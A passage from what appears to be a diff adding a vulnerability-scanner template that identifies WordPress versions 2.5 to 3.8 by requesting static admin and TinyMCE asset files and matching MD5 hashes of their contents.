"{{BaseURL}}/wp-admin/images/press-this.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"beef1f704b00931544c0ddb07933c498\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e738cdc2da9198b7af77ba33fbb752a8\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"770f9ca889019ef90fae6b92307844b1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-vs.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"7d5abe2a367e42e87482743521166c1f\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"da70ee9298cc0b46e14af7221b8f47cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-dark-vs.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a7bd090aa6d1cd54ec9f2a9ccc1043db\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"7bb6c8eefdfb40b73cefc66b3d89bd5a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/about-updates-2x.png" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c041e28a6ea33aa206cf9b43c3b1f428\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-vs-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"550a69654948fc739ae5f9a537106cb4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-dark-vs-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"bf96d253f8dfcad84f9d649de07dd797\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo-vs-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"13e7ab1ac2f6c77f177c849576bfdf31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-badge.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"73b244635671611458e874a20707135d\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"1912d3a313bc7f8f75af486578bf62b1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/bubble_bg-rtl-2x.gif" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"507ddcae331a55002d8e006a8ea0504c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/stars-rtl-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"6ec2333cc32894b25402a1d21924a6c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/welcome-icons.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"ebbeff45f2fee9bef30233451be6c87f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"e0c1cc94af35c8b495e35e9e6fbdad05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-dark.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"8b77c74d3b2eec1f50bb59ae34bdb5ff\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"656e3c3b11412ae5c595f1bda2bd8a99\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-badge-2x.png" + matchers: + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"958efa9f64653d25a424ad21cd16dac1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/about-globe-2x.png" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"3003678c6ccc6f4c874f01e58dee454b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/about-search-2x.png" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ae40cbce246b6f3ea4d95b05939a92d6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/welcome-icons-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"520a173799e42122f793bed6c3c8fd64\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"7052395c86de7a8a3c2328e7d134680d\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"3ead5afa19537170bb980924397b70d6\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"f83458e18cccab400294d6c0643a51cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-shadow-rtl.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"6238d00c97d2f2fb553405d2cbd800b5\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"4d835884b29a5a91e4bb9fe1b1ba7e01\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo-vs.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"e8d9359697813d9df251808ec4b58b71\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"46b52530984eff532be3372596c66386\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8fc9d821d334b9534cb9b1b66a18498d\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"331b0948ff75aa7e7f336387572029aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/bubble_bg-rtl.gif" + matchers: + - type: dsl + name: 2.7 - 3.7.35 + dsl: + - "(\"0acb13b5fb21466f3984a5a3bdfc3869\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-shadow.png" + matchers: + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"91c68df0c5f4d4b84de19f51dbe4f3b7\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"7197be58fb0b972896f588341f400f4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-classic.min.css" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ee2d3f9b681056eb0c8c1a1703c110b2\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"6f75a7097c3ebc035d87ade4762f1800\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"02bd813359a3beef07d99f5f14b2a5c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh.min.css" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"e67f2d5d990caf64736f32b9ca54a950\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"135ed0d18597afe32bbfaf21c20e8587\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"3f14edb51035e43f31b24e8a3cf2552c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/about.js" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"753ddfb43ade0f3fb4c00b010bdeec60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/about.min.js" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"5644f43ee3e5a30fdcd478cd44c698f5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.flash.js" + matchers: + - type: dsl + name: 3.6 - 3.8.13 + dsl: + - "(\"4f9797db7014eb90511683e54dd80318\" == md5(body))" + - type: dsl + name: 3.7.14 - 3.8.35 + dsl: + - "(\"7bc0ee636b3b83484fc3b9348863bd22\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5.2 + dsl: + - "(\"4c84570d1147590363953bd6c694966b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"37b53904bf82e18d1fc0c92434617684\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/changelog.txt" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"01928d3405b7c4b0d5f82e1c8e1b4ac1\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"15bab07382420b0fd20cdbf308cad0cc\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"ca2c3fb188295605bfabaaef64114554\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"ce86f17aad09c14569675f27a8ee304a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.html5.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3fbc939309e4ab58452cd744892ab575\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"3229c9876dd8f4f2f2d6ec090e57fb13\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"ec192acff96dee19dd49e52d43f6240e\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"836d773c9e8efc8c15f6168bfcd08700\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.silverlight.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"56cb2a0e7a1e792a1a803aa3a527d7d6\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"20ff795950f0ef3b5115682db8f4111e\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"4152d57d9dcf7ea975bb05043e53a83e\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"e39810e51490907d70cb724175e27a7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.html4.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"5f70abca09e28bbde851a604ebd9e76f\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5.2 + dsl: + - "(\"851cc71705ebc4c9731a6673e3dfc3cf\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"734fe87262125790dd0e51428322bc73\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/dialog.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"2512108fca85f5d904ee6e0042180c85\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"43382eca508513e60da47f8becb0e1fd\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"3c9238e8e6e13af9fcbcf099335d17ee\" == md5(body))" + - type: dsl + name: 2.8 - 3.2.1 + dsl: + - "(\"9c93f6a41d7c635d738dd6796536a7c3\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"d490a91bd83042db45637b7147382f8d\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"46a1fb44a7971c5f203ebb8109ae4e3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/embedded.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"1fc0d1771755f5ce441c1dd278b3a495\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1fad35f87373d2784de6c125ce3942ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/tabs.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"6473bbcd0a011e9fcdd9f777ef437410\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"93f97588a35da1f45fdcb975d4380913\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-nextpage.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1601cf739eb25c25208344cf3b28ab71\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/gallery.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"87cb768e68c38f31ff91a0921d4ea0d8\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"fbcde0be231a69f57bf2ef8515a75b09\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1f35ba36cb43f1c5382a13e6941483df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-more.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"2325f2bd490235cde0e08d3000d2fd02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/gallery-2x.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"406ccfcbc06224cb89a5c524cf4bc69a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-more-2x.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"049ab5d6aec48ea7cd8a380e4785c096\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-nextpage-2x.png" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4a6f3e665911a3a0c081414a6227e5fb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/dialog.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"0ceb1bc740c467971507606441d36d7c\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"56b99f4e744b576fc0b79da0a997f328\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"61f260cc574683934afbb0af6917179c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"2c50db59d058317010775677fee63ac3\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"950b230e8c783672e82dd1f4977d6df3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/items.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"d201498a710fc8aac6e117820b9814b7\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"5cb42865ce70a58d420786854fed4ae1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_arrow.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"e21752451a9d80e276fef7b602bdbdba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_check.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"c7d003885737f94768eecae49dcbca63\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/tabs.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"6473bbcd0a011e9fcdd9f777ef437410\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"93f97588a35da1f45fdcb975d4380913\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/progress.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"50c5e3e79b276c92df6cc52caeb464f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/buttons.png" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"33b2f2e08cc3ade5254fec64c4183558\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"1e0acdc2135897e6a95bb40cfde2fbc6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/dialog.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"b66af30667a23ece1521fe354331c534\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"b8df654e244dce02616deee320db0a88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/content.css" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"581e2436d2cafd2141f4a75657e06245\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"afd85a39de6c920b04b88d4a04b83938\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"719a5228674fb83e322f29efa90b950e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ui.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"8beb8f4a330b1294c488f435873328ef\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"cd943049a33bbda3d7c53c16c3b644cc\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"68151de213c5a93151398138c4c88ef3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_silver.css" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"f66b026fe40921b62c0b77798876760a\" == md5(body))" + - type: dsl + name: 2.7 - 3.1.4 + dsl: + - "(\"623a420867f1da38168b5ab0eac1afcc\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"7b4e376df8959facda1645ab2853aec4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/dialog.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"084f7ce623cd2965a01f65c763f88eab\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"b6ccc7c5502dae22838aa47a0e2267a0\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"da587a5b75a903f0ab0bb5037dbb3395\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"55252ba2c0ed8e6cf62e28e111cb3b4d\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"32d8369bcd5f49067b6c0905b2bb6971\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"7c44580a01044be04ef075f9f28c99d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_silver.png" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"15fbf2b4a20dbaa86205af6764f4fee4\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"5690ef573f4dc74ec3eb4d101806976e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_black.png" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"9645f90b37102a3618a52be18b74b02b\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"a5ad448e9c25120cb7e05fffe4a6234f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg.png" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"36fd9fbd748860f515df259443367163\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"8c9b1f0ee9deb6374983650edbd6ddfc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_black.css" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"02a164ba69ca7d9182047b24944e1d69\" == md5(body))" + - type: dsl + name: 2.7 - 3.1.4 + dsl: + - "(\"dd03578fd4e33798de6d86c4564e4c66\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"41aa12855030ea15a9bb709c8cef254a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/quicktime.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"61da1ff8729ca5016344c4e8eb173369\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9a6a9fdead205b125c07ea37e71ed4f1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/shockwave.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"1ce7d48784981aac9d4375cf2effdc4d\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"baa643b587565755157618032dc93e3c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/iframe.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"a1af02e9ba370f64297087b46e80591e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/realmedia.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"b9734ee16d790e67bea01046feba28b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/trans.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/colorpicker.jpg" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"9bcc36292defe94bca5a013a1736c7d7\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"02ae48639aa5729e6a40fb64455c32a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/gotmoxie.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d97b715d73a13adef309a8a7103acb45\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"c1fb3ef2ad854a88d9eb8ee32d15e4ad\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/flash.gif" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"33adee48d32bbbba3e6412cc54ecf335\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"6c69b02015d09280332ff8b07e4ea2f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/windowsmedia.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"c327cd167b3a7bc263d908b0d0154ead\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/pagebreak.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"48872075f721bf57a517e3275d61c0ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/video.gif" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"f85c56813ea016a75e496bba50d66ab4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/icons.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"75ad72872bc6280c32609e12fc3b610a\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"7316b39211892b53eac6f76da7615461\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"092b023d8d0073b8f651a92a1f711ccd\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"e893a1f9e0c9c6240ba28756cf838f5f\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"79fd242f30fe7c067cdd1a2819286d96\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/shortcuts.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"9c5c4d7c3345923401c87d000c16fffc\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f938d4898b708a597605e6fa94e09f98\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"76ce06e62540684000cc9c46aae4474f\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"27719aba1a5b5cd66f21dc6396db11c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/editor_template_src.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"ebe2e88379da04870256a02af4d11660\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"682e22af10a0275e385f6ea70edca5ec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/about.js" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"4ae895d8be28f8b94dd4f5d206cd7d59\" == md5(body))" + - type: dsl + name: 2.7 - 3.1.4 + dsl: + - "(\"cd4f25e57d9c7c3c5eaed2b4234c8787\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"fb6dfda2a5bbf17d943427a5d18f2f95\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/charmap.js" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"23e6f0fdded2c9fd69ba1fd7d69f559a\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"dd98a4a6232979fcc260e47ca0dc831c\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f816574961189f44e338076169d21d1f\" == md5(body))" + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"27f30d99721bd0ff665a443c49a22702\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/color_picker.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"cfc0f59a846661e748cae1c0adca77dc\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"dabce3953a51e33865ec851680ef8e66\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"f2be5a5b4fa75f5024b4da7c48b6220a\" == md5(body))" + - type: dsl + name: 2.6 - 3.1.4 + dsl: + - "(\"2ce934aa3086cba10c51c6d055177f8f\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"a070e37ba9fa90f524d7ba237b075ff9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/source_editor.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"2a9abbfa6e2ade2906839928c6728d0a\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"f1199e7f280cb16315ce96b57c132b46\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"fc7ac5c28594efaaf39bcf1ddadd9856\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"cd02d9651fd1f076f4ac5d7d7961bd58\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"4b3abeb1908bef7872238e184a5a40d9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/anchor.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"f69b824ff2b94f22713614c2dc5992e0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"4a93a690b2394eb2a6c9d2cdda9c3724\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"7da0063f892dbbfe65fce99c5a31092a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"fda96d6d56eefb394e13c1bc1cb8619d\" == md5(body))" + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"8988b8d83a5d753ddcb3600b976780fd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/mark_loaded_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"470585e89c34ba73b4b5b0c820847eb1\" == md5(body))" + - type: dsl + name: 3.4 - 